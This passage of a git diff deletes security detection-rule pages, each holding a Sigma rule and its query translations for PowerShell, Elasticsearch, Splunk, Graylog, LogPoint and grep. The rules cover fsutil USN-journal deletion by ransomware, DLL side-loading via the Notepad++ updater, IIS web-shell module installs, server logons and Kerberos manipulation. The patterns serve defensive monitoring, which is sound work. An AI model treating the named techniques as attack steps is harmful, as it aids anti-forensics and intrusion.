-| **References**           | <ul><li>[https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn)</li><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.yaml)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html](https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html)</li></ul>  |
-| **Author**               | Ecco, E.M. Anhaus, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Fsutil Suspicious Invocation
-id: add64136-62e5-48ea-807e-88638d02df1e
-description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size..). Might be used by ransomwares during the attack (seen by NotPetya and others)
-author: Ecco, E.M. Anhaus, oscd.community
-date: 2019/09/26
-modified: 2019/11/11
-level: high
-references:
-    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.yaml
-    - https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html
-tags:
-    - attack.defense_evasion
-    - attack.t1070
-    - attack.t1551
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    binary_1:
-        Image|endswith: '\fsutil.exe'
-    binary_2:
-        OriginalFileName: 'fsutil.exe'
-    selection:
-        CommandLine|contains:
-            - 'deletejournal'  # usn deletejournal ==> generally ransomware or attacker
-            - 'createjournal'  # usn createjournal ==> can modify config to set it to a tiny size
-    condition: (1 of binary_*) and selection
-falsepositives:
-    - Admin activity
-    - Scripts and administrative tools used in the monitored environment
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.ID -eq "1") -and ($_.message -match "Image.*.*\\fsutil.exe" -or $_.message -match "OriginalFileName.*fsutil.exe") -and ($_.message -match "CommandLine.*.*deletejournal.*" -or $_.message -match "CommandLine.*.*createjournal.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\fsutil.exe OR OriginalFileName:"fsutil.exe") AND winlog.event_data.CommandLine.keyword:(*deletejournal* OR *createjournal*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/add64136-62e5-48ea-807e-88638d02df1e <<EOF
-{
-  "metadata": {
-    "title": "Fsutil Suspicious Invocation",
-    "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size..). Might be used by ransomwares during the attack (seen by NotPetya and others)",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1070",
-      "attack.t1551"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\fsutil.exe OR OriginalFileName:\"fsutil.exe\") AND winlog.event_data.CommandLine.keyword:(*deletejournal* OR *createjournal*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\fsutil.exe OR OriginalFileName:\"fsutil.exe\") AND winlog.event_data.CommandLine.keyword:(*deletejournal* OR *createjournal*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Fsutil Suspicious Invocation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\fsutil.exe OR OriginalFileName:"fsutil.exe") AND CommandLine.keyword:(*deletejournal* *createjournal*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\fsutil.exe" OR OriginalFileName="fsutil.exe") (CommandLine="*deletejournal*" OR CommandLine="*createjournal*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\fsutil.exe" OR OriginalFileName="fsutil.exe") CommandLine IN ["*deletejournal*", "*createjournal*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.*.*\fsutil\.exe|.*fsutil\.exe)))(?=.*(?:.*.*deletejournal.*|.*.*createjournal.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_gup.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_gup.md
deleted file mode 100644
index 4b7411b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_gup.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Suspicious GUP Usage       |
-|:-------------------------|:------------------|
-| **Description**          | Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1073: DLL Side-Loading](https://attack.mitre.org/techniques/T1073)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Execution of tools named GUP.exe and located in folders different than Notepad++\updater</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1574.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious GUP Usage
-id: 0a4f6091-223b-41f6-8743-f322ec84930b
-description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
-status: experimental
-references:
-    - https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html
-tags:
-    - attack.defense_evasion
-    - attack.t1073
-    - attack.t1574.002
-author: Florian Roth
-date: 2019/02/06
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\GUP.exe'
-    filter:
-        Image:
-            - 'C:\Users\\*\AppData\Local\Notepad++\updater\gup.exe'
-            - 'C:\Users\\*\AppData\Roaming\Notepad++\updater\gup.exe'
-            - 'C:\Program Files\Notepad++\updater\gup.exe'
-            - 'C:\Program Files (x86)\Notepad++\updater\gup.exe'
-    condition: selection and not filter
-falsepositives:
-    - Execution of tools named GUP.exe and located in folders different than Notepad++\updater
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\GUP.exe" -and  -not (($_.message -match "Image.*C:\\Users\\.*\\AppData\\Local\\Notepad\+\+\\updater\\gup.exe" -or $_.message -match "Image.*C:\\Users\\.*\\AppData\\Roaming\\Notepad\+\+\\updater\\gup.exe" -or $_.message -match "C:\\Program Files\\Notepad\+\+\\updater\\gup.exe" -or $_.message -match "C:\\Program Files (x86)\\Notepad\+\+\\updater\\gup.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\GUP.exe AND (NOT (winlog.event_data.Image.keyword:(C\:\\Users\\*\\AppData\\Local\\Notepad\+\+\\updater\\gup.exe OR C\:\\Users\\*\\AppData\\Roaming\\Notepad\+\+\\updater\\gup.exe OR C\:\\Program\ Files\\Notepad\+\+\\updater\\gup.exe OR C\:\\Program\ Files\ \(x86\)\\Notepad\+\+\\updater\\gup.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0a4f6091-223b-41f6-8743-f322ec84930b <<EOF
-{
-  "metadata": {
-    "title": "Suspicious GUP Usage",
-    "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1073",
-      "attack.t1574.002"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\GUP.exe AND (NOT (winlog.event_data.Image.keyword:(C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Notepad\\+\\+\\\\updater\\\\gup.exe OR C\\:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Notepad\\+\\+\\\\updater\\\\gup.exe OR C\\:\\\\Program\\ Files\\\\Notepad\\+\\+\\\\updater\\\\gup.exe OR C\\:\\\\Program\\ Files\\ \\(x86\\)\\\\Notepad\\+\\+\\\\updater\\\\gup.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\GUP.exe AND (NOT (winlog.event_data.Image.keyword:(C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Notepad\\+\\+\\\\updater\\\\gup.exe OR C\\:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Notepad\\+\\+\\\\updater\\\\gup.exe OR C\\:\\\\Program\\ Files\\\\Notepad\\+\\+\\\\updater\\\\gup.exe OR C\\:\\\\Program\\ Files\\ \\(x86\\)\\\\Notepad\\+\\+\\\\updater\\\\gup.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious GUP Usage'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\GUP.exe AND (NOT (Image.keyword:(C\:\\Users\\*\\AppData\\Local\\Notepad\+\+\\updater\\gup.exe C\:\\Users\\*\\AppData\\Roaming\\Notepad\+\+\\updater\\gup.exe C\:\\Program Files\\Notepad\+\+\\updater\\gup.exe C\:\\Program Files \(x86\)\\Notepad\+\+\\updater\\gup.exe))))
-```
-
-
-### splunk
-    
-```
-(Image="*\\GUP.exe" NOT ((Image="C:\\Users\\*\\AppData\\Local\\Notepad++\\updater\\gup.exe" OR Image="C:\\Users\\*\\AppData\\Roaming\\Notepad++\\updater\\gup.exe" OR Image="C:\\Program Files\\Notepad++\\updater\\gup.exe" OR Image="C:\\Program Files (x86)\\Notepad++\\updater\\gup.exe")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\GUP.exe"  -(Image IN ["C:\\Users\\*\\AppData\\Local\\Notepad++\\updater\\gup.exe", "C:\\Users\\*\\AppData\\Roaming\\Notepad++\\updater\\gup.exe", "C:\\Program Files\\Notepad++\\updater\\gup.exe", "C:\\Program Files (x86)\\Notepad++\\updater\\gup.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\GUP\.exe)(?=.*(?!.*(?:.*(?=.*(?:.*C:\Users\\.*\AppData\Local\Notepad\+\+\updater\gup\.exe|.*C:\Users\\.*\AppData\Roaming\Notepad\+\+\updater\gup\.exe|.*C:\Program Files\Notepad\+\+\updater\gup\.exe|.*C:\Program Files \(x86\)\Notepad\+\+\updater\gup\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_interactive_logons.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_interactive_logons.md
deleted file mode 100644
index 665f7b5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_interactive_logons.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Interactive Logon to Server Systems       |
-|:-------------------------|:------------------|
-| **Description**          | Detects interactive console logons to |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1078: Valid Accounts](https://attack.mitre.org/techniques/T1078)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Administrative activity via KVM or ILO board</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Interactive Logon to Server Systems
-id: 3ff152b2-1388-4984-9cd9-a323323fdadf
-description: Detects interactive console logons to
-author: Florian Roth
-date: 2017/03/17
-tags:
-    - attack.lateral_movement
-    - attack.t1078
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID:
-            - 528
-            - 529
-            - 4624
-            - 4625
-        LogonType: 2
-        ComputerName:
-            - '%ServerSystems%'
-            - '%DomainControllers%'
-    filter:
-        LogonProcessName: Advapi
-        ComputerName: '%Workstations%'
-    condition: selection and not filter
-falsepositives:
-    - Administrative activity via KVM or ILO board
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {((($_.ID -eq "528" -or $_.ID -eq "529" -or $_.ID -eq "4624" -or $_.ID -eq "4625") -and $_.message -match "LogonType.*2" -and ($_.message -match "%ServerSystems%" -or $_.message -match "%DomainControllers%")) -and  -not ($_.message -match "LogonProcessName.*Advapi" -and $_.message -match "ComputerName.*%Workstations%")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:("528" OR "529" OR "4624" OR "4625") AND winlog.event_data.LogonType:"2" AND winlog.ComputerName:("%ServerSystems%" OR "%DomainControllers%")) AND (NOT (winlog.event_data.LogonProcessName:"Advapi" AND winlog.ComputerName:"%Workstations%")))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3ff152b2-1388-4984-9cd9-a323323fdadf <<EOF
-{
-  "metadata": {
-    "title": "Interactive Logon to Server Systems",
-    "description": "Detects interactive console logons to",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1078"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:(\"528\" OR \"529\" OR \"4624\" OR \"4625\") AND winlog.event_data.LogonType:\"2\" AND winlog.ComputerName:(\"%ServerSystems%\" OR \"%DomainControllers%\")) AND (NOT (winlog.event_data.LogonProcessName:\"Advapi\" AND winlog.ComputerName:\"%Workstations%\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:(\"528\" OR \"529\" OR \"4624\" OR \"4625\") AND winlog.event_data.LogonType:\"2\" AND winlog.ComputerName:(\"%ServerSystems%\" OR \"%DomainControllers%\")) AND (NOT (winlog.event_data.LogonProcessName:\"Advapi\" AND winlog.ComputerName:\"%Workstations%\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Interactive Logon to Server Systems'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:("528" "529" "4624" "4625") AND LogonType:"2" AND ComputerName:("%ServerSystems%" "%DomainControllers%")) AND (NOT (LogonProcessName:"Advapi" AND ComputerName:"%Workstations%")))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" ((EventCode="528" OR EventCode="529" OR EventCode="4624" OR EventCode="4625") LogonType="2" (ComputerName="%ServerSystems%" OR ComputerName="%DomainControllers%")) NOT (LogonProcessName="Advapi" ComputerName="%Workstations%"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id IN ["528", "529", "4624", "4625"] logon_type="2" ComputerName IN ["%ServerSystems%", "%DomainControllers%"])  -(logon_process="Advapi" ComputerName="%Workstations%"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*528|.*529|.*4624|.*4625))(?=.*2)(?=.*(?:.*%ServerSystems%|.*%DomainControllers%))))(?=.*(?!.*(?:.*(?=.*Advapi)(?=.*%Workstations%)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_iss_module_install.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_iss_module_install.md
deleted file mode 100644
index bd7cad2..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_iss_module_install.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | IIS Native-Code Module Command Line Installation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious IIS native-code module installations via command line |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1100: Web Shell](https://attack.mitre.org/techniques/T1100)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown as it may vary from organisation to arganisation how admins use to install IIS modules</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/](https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1505.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: IIS Native-Code Module Command Line Installation
-id: 9465ddf4-f9e4-4ebd-8d98-702df3a93239
-description: Detects suspicious IIS native-code module installations via command line
-status: experimental
-references:
-    - https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/
-author: Florian Roth
-date: 2012/12/11
-tags:
-    - attack.persistence
-    - attack.t1100
-    - attack.t1505.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '*\APPCMD.EXE install module /name:*'
-    condition: selection
-falsepositives:
-    - Unknown as it may vary from organisation to arganisation how admins use to install IIS modules
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*\\APPCMD.EXE install module /name:.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\\APPCMD.EXE\ install\ module\ \/name\:*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9465ddf4-f9e4-4ebd-8d98-702df3a93239 <<EOF
-{
-  "metadata": {
-    "title": "IIS Native-Code Module Command Line Installation",
-    "description": "Detects suspicious IIS native-code module installations via command line",
-    "tags": [
-      "attack.persistence",
-      "attack.t1100",
-      "attack.t1505.003"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\\\APPCMD.EXE\\ install\\ module\\ \\/name\\:*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\\\APPCMD.EXE\\ install\\ module\\ \\/name\\:*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'IIS Native-Code Module Command Line Installation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*\\APPCMD.EXE install module \/name\:*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\APPCMD.EXE install module /name:*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*\\APPCMD.EXE install module /name:*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\APPCMD\.EXE install module /name:.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_kerberos_manipulation.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_kerberos_manipulation.md
deleted file mode 100644
index 2921ab2..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_kerberos_manipulation.md
+++ /dev/null
@@ -1,204 +0,0 @@
-| Title                    | Kerberos Manipulation       |
-|:-------------------------|:------------------|
-| **Description**          | This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1212: Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Faulty legacy applications</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Kerberos Manipulation
-id: f7644214-0eb0-4ace-9455-331ec4c09253
-description: This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages
-author: Florian Roth
-date: 2017/02/10
-tags:
-    - attack.credential_access
-    - attack.t1212
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID:
-          - 675
-          - 4768
-          - 4769
-          - 4771
-        FailureCode:
-          - '0x9'
-          - '0xA'
-          - '0xB'
-          - '0xF'
-          - '0x10'
-          - '0x11'
-          - '0x13'
-          - '0x14'
-          - '0x1A'
-          - '0x1F'
-          - '0x21'
-          - '0x22'
-          - '0x23'
-          - '0x24'
-          - '0x26'
-          - '0x27'
-          - '0x28'
-          - '0x29'
-          - '0x2C'
-          - '0x2D'
-          - '0x2E'
-          - '0x2F'
-          - '0x31'
-          - '0x32'
-          - '0x3E'
-          - '0x3F'
-          - '0x40'
-          - '0x41'
-          - '0x43'
-          - '0x44'
-    condition: selection
-falsepositives:
-    - Faulty legacy applications
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "675" -or $_.ID -eq "4768" -or $_.ID -eq "4769" -or $_.ID -eq "4771") -and ($_.message -match "0x9" -or $_.message -match "0xA" -or $_.message -match "0xB" -or $_.message -match "0xF" -or $_.message -match "0x10" -or $_.message -match "0x11" -or $_.message -match "0x13" -or $_.message -match "0x14" -or $_.message -match "0x1A" -or $_.message -match "0x1F" -or $_.message -match "0x21" -or $_.message -match "0x22" -or $_.message -match "0x23" -or $_.message -match "0x24" -or $_.message -match "0x26" -or $_.message -match "0x27" -or $_.message -match "0x28" -or $_.message -match "0x29" -or $_.message -match "0x2C" -or $_.message -match "0x2D" -or $_.message -match "0x2E" -or $_.message -match "0x2F" -or $_.message -match "0x31" -or $_.message -match "0x32" -or $_.message -match "0x3E" -or $_.message -match "0x3F" -or $_.message -match "0x40" -or $_.message -match "0x41" -or $_.message -match "0x43" -or $_.message -match "0x44")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:("675" OR "4768" OR "4769" OR "4771") AND winlog.event_data.FailureCode:("0x9" OR "0xA" OR "0xB" OR "0xF" OR "0x10" OR "0x11" OR "0x13" OR "0x14" OR "0x1A" OR "0x1F" OR "0x21" OR "0x22" OR "0x23" OR "0x24" OR "0x26" OR "0x27" OR "0x28" OR "0x29" OR "0x2C" OR "0x2D" OR "0x2E" OR "0x2F" OR "0x31" OR "0x32" OR "0x3E" OR "0x3F" OR "0x40" OR "0x41" OR "0x43" OR "0x44"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f7644214-0eb0-4ace-9455-331ec4c09253 <<EOF
-{
-  "metadata": {
-    "title": "Kerberos Manipulation",
-    "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1212"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"675\" OR \"4768\" OR \"4769\" OR \"4771\") AND winlog.event_data.FailureCode:(\"0x9\" OR \"0xA\" OR \"0xB\" OR \"0xF\" OR \"0x10\" OR \"0x11\" OR \"0x13\" OR \"0x14\" OR \"0x1A\" OR \"0x1F\" OR \"0x21\" OR \"0x22\" OR \"0x23\" OR \"0x24\" OR \"0x26\" OR \"0x27\" OR \"0x28\" OR \"0x29\" OR \"0x2C\" OR \"0x2D\" OR \"0x2E\" OR \"0x2F\" OR \"0x31\" OR \"0x32\" OR \"0x3E\" OR \"0x3F\" OR \"0x40\" OR \"0x41\" OR \"0x43\" OR \"0x44\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
